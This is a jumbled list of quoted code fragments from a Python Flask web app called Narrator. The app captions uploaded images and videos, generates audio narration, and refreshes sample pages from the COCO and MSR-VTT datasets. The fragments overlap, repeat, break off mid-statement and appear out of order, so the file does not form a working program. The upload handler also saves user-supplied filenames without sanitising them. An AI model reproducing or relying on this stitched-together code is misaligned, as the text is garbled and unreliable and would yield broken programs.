"IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for",
"return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save",
"video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene",
"sample information and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)):",
"given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path",
"file and allowed_file(file.filename): # Fix filename, save to file, get ext and determine",
"and allowed_file(file.filename): # Fix filename, save to file, get ext and determine type",
"return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path",
"+ '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file =",
"== app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not",
"im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names =",
"# Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] ==",
"import sys import shutil import pandas as pd import skimage.io as io import",
"+ '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')",
"request.form # Check if filetype is allowed if file and allowed_file(file.filename): # Fix",
"[]] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)): im_sample",
"sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for",
"for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score",
"'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url':",
"im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT,",
"= '' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption)",
"exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes",
"+ name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name,",
"scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact():",
"\"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render",
"time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption",
"x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in",
"best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu",
"gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score =",
"captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio",
"Generate caption/audio and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path,",
"rand_im_ids = [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)]",
"to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize()",
"by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename",
"' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im =",
"file has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1]",
"+ name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update",
"caption/audio by scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path,",
"'_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") #",
"# Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for",
"in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] +",
"= gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x,",
"name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name +",
"caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload",
"= samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix)",
"im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] +",
"'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][",
"+ '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples",
"video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image'",
"chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in",
"dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt",
"'' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if",
"gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt",
"sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption",
"file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\"",
"1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt =",
"1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path =",
"import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator(",
"'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for",
"narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id']",
"and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all",
"= narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption,",
"= [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.'",
"caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output # page",
"columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0:",
"= app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already",
"app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by",
"KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename,",
"images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos():",
"if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename",
"dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file",
"= narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in",
"i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) +",
"\"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return",
"'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: #",
"vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda",
"else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = []",
"app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt",
"if filetype is allowed if file and allowed_file(file.filename): # Fix filename, save to",
"caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') #",
"Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video",
"0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score:",
"Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create",
"by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return",
"methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate",
"and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image'",
"save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio",
"gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] +",
"+ '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return",
"= samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id':",
"app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio':",
"}) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has",
"# update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name,",
"'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ',",
"file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext",
"narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] +",
"beam_size=8) # Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id']",
"@app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render",
"given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\"",
"vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save",
"= caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR']",
"'.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False)",
"pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row",
"name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename)",
"datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv')",
"by_scene = False # Generate caption/audio and redirect to demo_output page if not",
"to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict",
"demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio =",
"session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e:",
"typ=typ)) # Generate caption/audio by scene and redirect to demo_output # page captions,",
"if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename +",
"samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv')",
"# Replace existing . with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine",
"'_') file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if",
"str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene',",
"ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace",
"= pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i,",
"ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF =",
"shutil import pandas as pd import skimage.io as io import PIL from flask",
"narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i],",
"index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image",
"to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and",
"'.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption",
"in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu",
"os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file",
"== im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts =",
"def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about():",
"[] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' +",
"import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import",
"enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time':",
"title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\"",
"ext and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename,",
"page.\"\"\" # Duplicate of above -- allows if request.method == 'POST': try: #",
"= [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids",
"in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu",
"'by_scene' in request.form # Check if filetype is allowed if file and allowed_file(file.filename):",
":len(vid_names)] # Generate sample information and store to file for i, (name, im_id)",
"page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio =",
"and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x:",
"typ == 'image': by_scene = False # Generate caption/audio and redirect to demo_output",
"Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE']",
"x: x.capitalize()) # Generate audio files for each caption for i, caption in",
"x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest",
"app. \"\"\" import os import sys import shutil import pandas as pd import",
"= bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize()",
"return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split",
"pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names = [x for x",
"render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI')",
"enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples",
"gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video",
"app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if not os.path.exists(scene_example_file",
"pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x:",
"methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded",
"= im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for",
"+ '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP ####################################",
"rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url,",
"e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename):",
"}) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as",
"Find the nearest gt nearest_gt = '' best_score = 0.0 for gt in",
"= pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos",
"ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR']",
"clean=True)) # Find the nearest gt nearest_gt = '' best_score = 0.0 for",
"already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids =",
"\"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def",
"' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url,",
"gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save",
"'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR']",
"render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo",
"gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = ''",
"\"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if request.method ==",
"+ '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg',",
"file, and if by_scene is requested from website file = request.files['file'] by_scene =",
"of Narrator web app. \"\"\" import os import sys import shutil import pandas",
"clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0 for gt",
"== vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts =",
"file, get ext and determine type file.filename = file.filename.replace(' ', '_') file_path =",
"\"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list):",
"def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_')",
"index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing",
"def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'],",
"'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() })",
"'.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4')",
"for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' +",
"sys import shutil import pandas as pd import skimage.io as io import PIL",
"+ '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file +",
"bleu > best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize()",
"= msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if",
"caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions",
"+ name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update",
"filename = '_'.join(filename) # Replace existing . with _ return filename, ext def",
"' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name +",
"and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'],",
"= '' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption)",
"'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in",
"their respective datasets and reject any that already have been # chosen rand_im_ids",
"if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video'",
"# Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else:",
"= ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory",
". with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or",
"IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'],",
"enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id",
"loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE']",
"file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename,",
"Duplicate of above -- allows if request.method == 'POST': try: # Grab file,",
"'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!')",
"Fix filename, save to file, get ext and determine type file.filename = file.filename.replace('",
"os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and",
"that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids",
"caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg')",
"samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x",
"requested from website file = request.files['file'] by_scene = 'by_scene' in request.form # Check",
"scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes,",
"nearest_gt = '' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt],",
"return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return",
"# Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True,",
"by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create",
"= cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1))",
"'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id':",
"/ 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio':",
"existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco",
"sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption':",
"[], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample",
"page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo',",
"'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio)",
"index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples",
"msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names = [x",
"vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix)",
"+ '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i /",
"# page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = []",
"vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH']",
"\"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\"",
"'video' in x] # Randomly select ids from their respective datasets and reject",
"'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load",
"nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load",
"+ '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe",
"cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and",
"samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos",
"filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output",
"[[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix",
"render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html',",
"beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] +",
"'.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given",
